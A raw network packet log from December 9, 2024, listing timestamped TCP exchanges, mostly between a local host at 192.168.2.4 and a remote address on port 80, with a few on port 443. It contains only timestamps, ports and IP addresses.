                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.610861063 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.610902071 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.611490965 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.611581087 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.611618042 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.612346888 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.612395048 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.612425089 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.612462997 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.613221884 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.613333941 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.613370895 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.614099026 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.614182949 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.614228010 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.614918947 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.614984989 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.615034103 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.615807056 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.615906954 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.615919113 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.615968943 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.616631985 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.616683006 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.616764069 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.616858959 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.617449999 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.617501020 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.617518902 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.617578983 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.618278980 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.618335009 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.618374109 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.618411064 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.619136095 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.619191885 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.619234085 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.619275093 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.619978905 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.620125055 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.620223999 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.620836020 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.620898008 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.620997906 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.621037960 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.621670961 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.621718884 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.621742010 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.621778965 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.622539997 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.622584105 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.622648954 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.622685909 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.623409033 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.623454094 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.623471975 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.623549938 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.624326944 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.624366045 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.624403954 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.624440908 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.625128984 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.625184059 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.625210047 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.625250101 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.625937939 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.625981092 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.626015902 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.626111984 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.626763105 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.626810074 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.626945019 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.626980066 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.627697945 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.627753019 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.627799034 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.628546953 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.628624916 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.628895998 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.629308939 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.629378080 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.629435062 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.629586935 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.630161047 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.630245924 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.630371094 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.631021976 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.631110907 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.631710052 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.631922960 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.631946087 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.632014036 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.632709980 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.632759094 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.632802963 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.632968903 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.633555889 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.633635998 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.634438992 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.634553909 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.635309935 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.635418892 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.636066914 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.636137009 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.636257887 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.636969090 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.637020111 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.637851000 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.638061047 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.638642073 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.638705015 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.639486074 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.639667988 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.640331984 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.640454054 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.641199112 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.641325951 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.642050982 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.642158985 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.642916918 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.643091917 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.643752098 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.643860102 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.644570112 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.651691914 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.651881933 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.651982069 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.752388954 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.752466917 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.752820015 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.752906084 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.753663063 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.753798962 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.754120111 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.754471064 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.754615068 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.776549101 CET44349852104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.781265974 CET49852443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.783126116 CET49852443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.783132076 CET44349852104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.783343077 CET44349852104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.788528919 CET49852443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.789237976 CET49852443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.789271116 CET44349852104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.795798063 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.795854092 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.796200037 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.796267033 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.796943903 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.797111988 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.797297001 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.797873020 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.798032045 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.798691988 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.798783064 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.799541950 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.799688101 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.800409079 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.800575972 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.801227093 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.801292896 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.802083015 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.802206993 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.802953005 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.803112030 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.803814888 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.803881884 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.804665089 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.804773092 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.805505991 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.805690050 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.805922031 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.805969954 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.805998087 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.806355953 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.806459904 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.806719065 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.807173967 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.807308912 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.808068991 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.808173895 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.808881044 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.808990002 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.809642076 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.809721947 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.809762955 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.809832096 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.810602903 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.810683966 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.811429977 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.811528921 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.812056065 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.812289000 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.812398911 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.812494040 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.813105106 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.813149929 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.813189030 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.813364029 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.814070940 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.814210892 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.814239979 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.814270973 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.814826012 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.814898968 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.815011024 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.815274000 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.815644979 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.815758944 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.816556931 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.816735983 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.819228888 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.819324970 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.819336891 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.819581985 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.819593906 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.819605112 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.819991112 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.820121050 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.820132971 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.820146084 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.820178986 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.820775986 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.820877075 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.821233988 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.821664095 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.821811914 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.821846962 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.822124958 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.822559118 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.822669983 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.822696924 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.822760105 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.823491096 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.823535919 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.824227095 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.824271917 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.831991911 CET4983880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834201097 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834285021 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834301949 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834453106 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834465027 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834475994 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834489107 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834783077 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834912062 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834923983 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834934950 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834947109 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834958076 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834969044 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834981918 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.834992886 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.835659027 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.835676908 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.835695028 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.835712910 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.835731983 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.835748911 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.835761070 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.835777998 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.836385012 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.836400986 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.836507082 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.836659908 CET8049838185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:36.838056087 CET4983880192.168.2.4185.215.113.16
